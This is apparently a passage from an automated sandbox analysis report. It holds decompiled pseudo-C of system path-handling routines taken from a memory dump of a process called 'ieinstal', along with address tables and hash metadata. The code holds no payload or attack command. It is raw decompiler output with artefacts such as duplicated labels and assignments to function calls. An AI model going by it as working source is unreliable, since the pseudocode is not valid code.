				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x227fd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_push("true");
				_t59 = __ecx;
				_pop(_t55);
				if(L22724120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E2274B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = L227498D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					L227495D0();
					L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x2273d29c
0x2273d2a6
0x2273d2b1
0x2273d2b5
0x2273d2b6
0x2273d2bc
0x2273d2bd
0x2273d2be
0x2273d2bf
0x2273d2c0
0x2273d2c2
0x2273d2c4
0x2273d2cc
0x2273d384
0x2273d34b
0x2273d34f
0x2273d350
0x2273d351
0x2273d35c
0x2273d35c
0x2273d2d6
0x2273d2da
0x2273d2e1
0x2273d361
0x2273d369
0x2273d36d
0x2273d2e3
0x2273d2e3
0x2273d2e3
0x2273d2e5
0x2273d2ed
0x2273d2f5
0x2273d2fa
0x2273d302
0x2273d303
0x2273d30b
0x2273d30f
0x2273d313
0x2273d318
0x2273d31c
0x2273d320
0x2273d379
0x2273d37d
0x00000000
0x00000000
0x2277affe
0x2277b001
0x2277b011
0x00000000
0x2273d322
0x2273d322
0x2273d330
0x2273d337
0x2273d35d
0x2273d339
0x2273d33f
0x2273d38c
0x2273d38c
0x2273d33f
0x2273d349
0x00000000
0x2273d349

Strings

@, xrefs: 2273D303

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ba7c57615093bc58c3c292f1fdf5ab61020d6d24ee437b03ef941aadbb050fdc
Instruction ID: 2ab15e2999ae1cc6f576291147482b65cce921d565c3f2673bf1a6d561018bcb
Opcode Fuzzy Hash: ba7c57615093bc58c3c292f1fdf5ab61020d6d24ee437b03ef941aadbb050fdc
Instruction Fuzzy Hash: EB315EB554C745DFC312CF28C984A5BBBE8EB95754F400A2EF99493252D734DE08CB92

Uniqueness

Uniqueness Score: -1.00%

Function 22726E30 Relevance: .5, Instructions: 481
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E22726E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x227dfca8);
				_push(0x227517f0);
				_push( *[fs:0x0]);
				_t312 =  *0x227fd360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E2274FA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = L227274C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										L22739BC6( &_v52, 0x226e1080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E22749377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E227846A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M2272749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E227052A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L22712600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L22712600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L22784735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E2274BB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = L22732010(__ecx, __eflags, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L22784658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = L22739BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E227052A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L227083AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E227052A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L227083AE(_t428);
														L80:
														L22739BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x226e1080;
														_v72 =  *0x226e1080;
														__eax =  *0x226e1084;
														_v68 =  *0x226e1084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = L22739BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															L2272746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E2274B640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t366 = _t445 + 1;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t425 = _v88;
																			if(_t445 + 2 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

0x22726e30
0x22726e35
0x22726e37
0x22726e3c
0x22726e47
0x22726e4b
0x22726e50
0x22726e53
0x22726e55
0x22726e5b
0x22726e5f
0x22726e65
0x22726e68
0x22726e6a
0x22726e6d
0x22726e70
0x22726e73
0x22726e76
0x22726e79
0x22726e7c
0x22726e7f
0x22726e84
0x2272710f
0x2272710f
0x22726e8c
0x22726e8e
0x22726e8e
0x22726e97
0x2276f5d3
0x2276f5d3
0x22726e9d
0x22726ea3
0x22726eaa
0x22726ead
0x22726eb2
0x22726eb4
0x22726eb7
0x22727466
0x22727466
0x00000000
0x22726ebd
0x22726ebd
0x22726ec4
0x22726eca
0x22726ecc
0x22726ecf
0x22726ed2
0x22726ede
0x2276f5df
0x2276f5e0
0x00000000
0x2276f5e0
0x22726ee6
0x00000000
0x00000000
0x22726eec
0x22726ef3
0x22727181
0x22726f02
0x22726f02
0x22726f02
0x22726f0b
0x22726f0d
0x22726f10
0x22726f17
0x22726f21
0x22726f24
0x22726f2d
0x22726f31
0x22726f36
0x22726f3d
0x22727413
0x22727416
0x22727419
0x2272741c
0x22727421
0x2272742b
0x2272742b
0x2272742e
0x22727439
0x2276f60b
0x2276f60b
0x2276f615
0x2276f619
0x2272743f
0x22727447
0x22727454
0x2272745a
0x2272745f
0x2272745f
0x00000000
0x22727439
0x22727425
0x2276f5e9
0x2276f5ed
0x2276f5f4
0x00000000
0x00000000
0x2276f5fd
0x00000000
0x00000000
0x2276f603
0x2276f603
0x00000000
0x22726f43
0x22726f43
0x22726f45
0x22726f48
0x22726f4e
0x22726f65
0x22726f68
0x2272721f
0x22726f83
0x22726f86
0x227272dc
0x227272dc
0x22726f9e
0x22726fa1
0x22726fa3
0x22726fa5
0x22726fa8
0x22726fab
0x22726fae
0x22726fb1
0x22726fb4
0x22726fb6
0x22726fb9
0x22726fbf
0x2272718a
0x2272718e
0x2276f831
0x2276f831
0x2276f833
0x2276f836
0x00000000
0x2276f836
0x22727194
0x00000000
0x2276f658
0x2276f658
0x2276f65a
0x2276f65d
0x2276f662
0x2276f662
0x2276f665
0x2276f667
0x00000000
0x00000000
0x2276f669
0x2276f66c
0x2276f670
0x2276f673
0x2276f67a
0x2276f67a
0x2276f67b
0x2276f67e
0x2276f681
0x00000000
0x00000000
0x2276f683
0x2276f683
0x00000000
0x2276f683
0x2276f675
0x2276f678
0x00000000
0x00000000
0x00000000
0x2276f678
0x2276f686
0x2276f688
0x2276f68b
0x2276f68e
0x2276f691
0x2276f694
0x2276f698
0x2276f69c
0x2276f6a0
0x00000000
0x00000000
0x00000000
0x00000000
0x22727397
0x2272739c
0x2272739f
0x227273a3
0x227273a5
0x2276f6bb
0x2276f6c1
0x2276f6c4
0x227273ab
0x227273ab
0x227273ab
0x227273b1
0x227273b5
0x227273ba
0x227273c0
0x227273c3
0x227273c7
0x227273cc
0x227273d0
0x227273d3
0x2276f6cc
0x2276f6d4
0x2276f6d9
0x2276f6dd
0x2276f6e1
0x2276f6e5
0x2276f6f0
0x2276f6fc
0x2276f700
0x2276f709
0x2276f70e
0x2276f710
0x2276f784
0x2276f788
0x2276f78b
0x2276f78e
0x2276f790
0x2276f792
0x2276f795
0x2276f798
0x2276f7b7
0x2276f7b7
0x2276f7ba
0x2276f7ba
0x00000000
0x2276f7ba
0x2276f79a
0x2276f79d
0x00000000
0x00000000
0x2276f79f
0x2276f7a4
0x2276f7a7
0x2276f7ab
0x2276f7ae
0x2276f7b1
0x00000000
0x2276f7b1
0x2276f712
0x2276f717
0x2276f74c
0x2276f74e
0x2276f752
0x2276f756
0x2276f75d
0x2276f761
0x2276f764
0x2276f76c
0x2276f771
0x2276f775
0x2276f778
0x2276f77c
0x00000000
0x2276f77c
0x2276f719
0x2276f71d
0x2276f720
0x2276f723
0x2276f726
0x2276f729
0x2276f72e
0x2276f740
0x2276f744
0x00000000
0x2276f744
0x2276f730
0x2276f732
0x2276f735
0x2276f738
0x00000000
0x227273d9
0x227273d9
0x227273db
0x227273de
0x227273e1
0x227273e4
0x227273e7
0x227273ea
0x227273ef
0x227273f2
0x227273f6
0x227273f9
0x227273f9
0x227273fe
0x22727401
0x22727406
0x22727409
0x00000000
0x22727409
0x00000000
0x2276f7c5
0x2276f7ca
0x2276f7cd
0x2276f7d1
0x2276f7d3
0x2276f7da
0x2276f7e0
0x2276f7e3
0x2276f7e3
0x2276f7e6
0x2276f7d5
0x2276f7d5
0x2276f7d5
0x2276f7e9
0x2276f7eb
0x2276f7f0
0x2276f7f3
0x2276f7f5
0x2276f7f8
0x2276f7fb
0x2276f7fe
0x2276f801
0x2276f80f
0x2276f814
0x2276f803
0x2276f803
0x2276f806
0x2276f806
0x00000000
0x00000000
0x2272719d
0x227271a2
0x227271a5
0x227271a9
0x227271ab
0x2276f826
0x2276f829
0x227271b1
0x227271b1
0x227271ba
0x227271ba
0x227271bf
0x227271c5
0x227271cf
0x227271d2
0x227271d8
0x227271dd
0x227271e4
0x227271e7
0x00000000
0x00000000
0x22727275
0x2272727a
0x2272727d
0x2272727f
0x22727282
0x22727284
0x2276f6a8
0x2276f6aa
0x2276f6aa
0x2272728a
0x2272728f
0x22727292
0x22727297
0x2272729a
0x2272729d
0x227272a0
0x227272a5
0x227272a9
0x227272ac
0x227272af
0x227272b2
0x227272b5
0x227272b7
0x227272ba
0x227272be
0x227272be
0x227272c2
0x227272c5
0x227272c8
0x2276f6b2
0x2276f6b2
0x00000000
0x00000000
0x22726fc5
0x22726fc5
0x22726fcc
0x22726fd8
0x22726fda
0x22726fdd
0x22726fe3
0x22727162
0x2276f845
0x00000000
0x00000000
0x2276f84e
0x2276f8c4
0x2276f8c8
0x2276f8cb
0x2276f8ce
0x227270e0
0x227270e0
0x227270e3
0x227270e3
0x227270ea
0x227270ef
0x227270f1
0x227270f4
0x227270fc
0x227270fd
0x227270fe
0x2272710c
0x2272710c
0x2276f850
0x2276f858
0x2276f87a
0x2276f88a
0x2276f88d
0x2276f890
0x2276f893
0x2276f895
0x2276f898
0x2276f8a4
0x2276f8ad
0x2276f8b0
0x2276f8b3
0x2276f8b3
0x2276f8a4
0x22726fec
0x22726fec
0x22726fee
0x00000000
0x22726ff1
0x22726ff8
0x00000000
0x22726ffe
0x22727004
0x22727006
0x22727006
0x22727010
0x22727017
0x2272701e
0x22727072
0x22727074
0x2272707e
0x22727083
0x22727087
0x22727088
0x2272706c
0x2272706c
0x2272706d
0x00000000
0x2272706d
0x2272707c
0x00000000
0x00000000
0x00000000
0x2272707c
0x22727020
0x22727023
0x227271ef
0x227271f2
0x227271f7
0x00000000
0x00000000
0x227271fd
0x22727200
0x22727205
0x2272720b
0x2272720e
0x227272eb
0x00000000
0x00000000
0x227272f6
0x00000000
0x22727030
0x22727037
